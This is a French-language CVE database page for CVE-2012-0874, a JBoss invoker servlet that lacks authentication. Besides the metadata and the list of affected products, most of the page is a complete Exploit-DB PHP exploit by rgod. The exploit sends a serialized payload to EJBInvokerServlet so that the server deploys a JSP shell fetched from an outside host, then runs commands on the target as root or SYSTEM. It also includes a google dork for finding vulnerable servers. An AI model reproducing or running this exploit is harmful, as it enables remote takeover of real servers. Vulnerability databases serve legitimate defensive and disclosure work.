CVE-2012-0874
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
The (1) JMXInvokerHAServlet and (2) EJBInvokerHAServlet invoker servlets in JBoss Enterprise Application Platform (EAP) before 5.2.0, Web Platform (EWP) before 5.2.0, BRMS Platform before 5.3.1, and SOA Platform before 5.3.1 do not require authentication by default in certain profiles, which might allow remote attackers to invoke MBean methods and execute arbitrary code via unspecified vectors. NOTE: this issue can only be exploited when the interceptor is not properly configured with a "second layer of authentication," or when used in conjunction with other vulnerabilities that bypass this second layer.
Informations du CVE
Faiblesses connexes
| Nom de la faiblesse | Source | |
|---|---|---|
| Improper Authentication When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct. |
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 6.8 | AV:N/AC:M/Au:N/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 30211
Date de publication : 2013-12-10 23h00 +00:00
Auteur : rgod
EDB Vérifié : No
EMC Data Protection Advisor DPA Illuminator EJBInvokerServlet Remote Code Execution
tested against: Microsoft Windows Server 2008 r2 sp1
EMC Data Protection Advisor 5.8 sp5
vulnerability:
the "DPA Illuminator" service (DPA_Illuminator.exe) listening
on public port 8090 (tcp/http) and 8453 (tcp/https) is vulnerable.
It exposes the following servlet:
http://[host]:8090/invoker/EJBInvokerServlet
https://[host]:8453//invoker/EJBInvokerServlet
due to a bundled invoker.war
The result is remote code execution with NT AUTHORITY\SYSTEM
privileges.
proof of concept url:
http://retrogod.altervista.org/9sg_ejb.html
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30211.tgz
~rgod~
<?php
/*
Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object
Remote Code Execution
google dork: inurl:status EJBInvokerServlet
this was used successfully on Windows during a penetration test against
McAfee Web Reporter 5.2.1 (tcp port 9111/http) gaining administrative privileges
see: http://www.mcafee.com/it/downloads/downloads.aspx
file tested: webreporter64bit.zip
Usage:
C:\PHP>php 9sg_ejb.php 192.168.0.1 id
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=2006101
62339)/Tomcat-5.5
Set-Cookie: JSESSIONID=E9EEE1D6AD27D64ED3835C1092C4FC29; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 43
Date: Fri, 04 Oct 2013 07:25:48 GMT
Connection: close
uid=0(root) gid=0(root) groups=0(root)
C:\PHP>
~ rgod ~
*/
$host=$argv[1];
$cmd=$argv[2];
//$port=9111; //mcafee
$port=80;
//small jsp shell
//change this if you want, url to the app to be deployed, keep it short
$url="http://retrogod.altervista.org/a.war?";
$url_len=pack("n",strlen($url));
function hex_dump($data, $newline="\n") {
static $from = '';
static $to = '';
static $width = 16; static $pad = '.';
if ($from==='') {
for ($i=0; $i<=0xFF; $i++) {
$from .= chr($i);
$to .= ($i >= 0x20 && $i <= 0x7E) ? chr($i) : $pad;
}
}
$hex = str_split(bin2hex($data), $width*2);
$chars = str_split(strtr($data, $from, $to), $width);
$offset = 0;
foreach ($hex as $i => $line) {
echo sprintf('%6X',$offset).' : '.implode(' ', str_split($line,2)) . ' [' . $chars[$i] . ']' . $newline;
$offset += $width;
}
}
$frag_i=
"\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73". // ....sr.) org.jbos
"\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d\x61\x72". // s.invoca tion.Mar
"\x73\x68\x61\x6c\x6c\x65\x64\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f". // shalledI nvocatio
"\x6e\xf6\x06\x95\x27\x41\x3e\xa4\xbe\x0c\x00\x00\x78\x70\x70\x77". // n...'A>. ....xppw
"\x08\x78\x94\x98\x47\xc1\xd0\x53\x87\x73\x72\x00\x11\x6a\x61\x76". // .x..G..S .sr..jav
"\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2". // a.lang.I nteger..
"\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75". // .....8.. .I..valu
"\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e". // exr..jav a.lang.N
"\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00". // umber... ........
"\x78\x70\x26\x95\xbe\x0a\x73\x72\x00\x24\x6f\x72\x67\x2e\x6a\x62". // xp&...sr .$org.jb
"\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d". // oss.invo cation.M
"\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x56\x61\x6c\x75\x65\xea\xcc". // arshalle dValue..
"\xe0\xd1\xf4\x4a\xd0\x99\x0c\x00\x00\x78\x70\x77";
$frag_ii="\x00";
$frag_iii=
"\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e". // .....ur. .[Ljava.
"\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f". // lang.Obj ect;..X.
"\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x04\x73\x72\x00". // .s)l...x p....sr.
"\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e". // .javax.m anagemen
"\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f\x03\xa7\x1b". // t.Object Name....
"\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x21\x6a\x62\x6f\x73". // .m.....x pt.!jbos
"\x73\x2e\x73\x79\x73\x74\x65\x6d\x3a\x73\x65\x72\x76\x69\x63\x65". // s.system :service
"\x3d\x4d\x61\x69\x6e\x44\x65\x70\x6c\x6f\x79\x65\x72\x78\x74\x00". // =MainDep loyerxt.
"\x06\x64\x65\x70\x6c\x6f\x79\x75\x71\x00\x7e\x00\x00\x00\x00\x00". // .deployu q.~.....
"\x01\x74".
$url_len.
$url.
"\x75\x72\x00".
"\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61". // ur..[ Ljava.la
"\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d". // ng.Strin g;..V...
"\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00\x10\x6a\x61". // {G...xp. ...t..ja
"\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67";
$frag_iv=
"\x0d\xd3".
"\xbe\xc9\x78\x77\x04\x00\x00\x00\x01\x73\x72\x00\x22\x6f\x72\x67". // ..xw.... .sr."org
"\x2e\x6a\x62\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f". // .jboss.i nvocatio
"\x6e\x2e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x4b\x65\x79\xb8". // n.Invoca tionKey.
"\xfb\x72\x84\xd7\x93\x85\xf9\x02\x00\x01\x49\x00\x07\x6f\x72\x64". // .r...... ..I..ord
"\x69\x6e\x61\x6c\x78\x70\x00\x00\x00\x05\x73\x71\x00\x7e\x00\x05". // inalxp.. ..sq.~..
"\x77\x0d\x00\x00\x00\x05\xac\xed\x00\x05\x70\xfb\x57\xa7\xaa\x78". // w....... ..p.W..x
"\x77\x04\x00\x00\x00\x03\x73\x71\x00\x7e\x00\x07\x00\x00\x00\x04". // w.....sq .~......
"\x73\x72\x00\x23\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e\x69\x6e". // sr.#org. jboss.in
"\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x49\x6e\x76\x6f\x63\x61\x74". // vocation .Invocat
"\x69\x6f\x6e\x54\x79\x70\x65\x59\xa7\x3a\x1c\xa5\x2b\x7c\xbf\x02". // ionTypeY .:..+|..
"\x00\x01\x49\x00\x07\x6f\x72\x64\x69\x6e\x61\x6c\x78\x70\x00\x00". // ..I..ord inalxp..
"\x00\x01\x73\x71\x00\x7e\x00\x07\x00\x00\x00\x0a\x70\x74\x00\x0f". // ..sq.~.. ....pt..
"\x4a\x4d\x58\x5f\x4f\x42\x4a\x45\x43\x54\x5f\x4e\x41\x4d\x45\x73". // JMX_OBJE CT_NAMEs
"\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d". // r..javax .managem
"\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f\x03". // ent.Obje ctName..
"\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x21\x6a\x62". // ...m.... .xpt.!jb
"\x6f\x73\x73\x2e\x73\x79\x73\x74\x65\x6d\x3a\x73\x65\x72\x76\x69". // oss.syst em:servi
"\x63\x65\x3d\x4d\x61\x69\x6e\x44\x65\x70\x6c\x6f\x79\x65\x72\x78". // ce=MainD eployerx
"\x78"; // x
$data=$frag_i.pack("v",strlen($frag_iii)+8).$frag_ii.pack("n",strlen($frag_iii)).$frag_iii.$frag_iv;
//$pk=""POST /invoker/JMXInvokerServlet/ HTTP/1.1\r\n". //the same ...
$pk="POST /invoker/EJBInvokerServlet/ HTTP/1.1\r\n".
"ContentType: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation\r\n".
"Accept-Encoding: x-gzip,x-deflate,gzip,deflate\r\n".
"User-Agent: Java/1.6.0_21\r\n".
"Host: ".$host.":".$port."\r\n".
"Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\r\n".
"Connection: keep-alive\r\n".
"Content-type: application/x-www-form-urlencoded\r\n".
"Content-Length: ".strlen($data)."\r\n\r\n".
$data;
echo hex_dump($pk)."\n";
$fp=fsockopen($host,$port,$e,$err,3);
fputs($fp,$pk);
$out=fread($fp,8192);
fclose($fp);
echo hex_dump($out)."\n";
sleep(5);
$pk="GET /a/pwn.jsp?cmd=".urlencode($cmd)." HTTP/1.0\r\n".
"Host: ".$host.":".$port."\r\n".
"Connection: Close\r\n\r\n";
echo hex_dump($pk)."\n";
$fp=fsockopen($host,$port,$e,$err,3);
fputs($fp,$pk);
$out="";
while (!feof($fp)) {
$out.=fread($fp,8192);
}
fclose($fp);
echo $out;
?>
Products Mentioned
Configuraton 0
Redhat>>Jboss_enterprise_application_platform >> Version 5.2.0
- Redhat>>Jboss_enterprise_application_platform >> Version 5.2.0 (Open CPE detail)
Configuraton 0
Redhat>>Jboss_enterprise_web_platform >> Version 5.2.0
- Redhat>>Jboss_enterprise_web_platform >> Version 5.2.0 (Open CPE detail)
Configuraton 0
Redhat>>Jboss_enterprise_brms_platform >> Version To (including) 5.3.0
- Redhat>>Jboss_enterprise_brms_platform >> Version 5.0.0 (Open CPE detail)
- Redhat>>Jboss_enterprise_brms_platform >> Version 5.0.1 (Open CPE detail)
- Redhat>>Jboss_enterprise_brms_platform >> Version 5.0.2 (Open CPE detail)
- Redhat>>Jboss_enterprise_brms_platform >> Version 5.1.0 (Open CPE detail)
- Redhat>>Jboss_enterprise_brms_platform >> Version 5.2.0 (Open CPE detail)
- Redhat>>Jboss_enterprise_brms_platform >> Version 5.3.0 (Open CPE detail)
Références
http://archives.neohapsis.com/archives/bugtraq/2013-12/0134.html
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
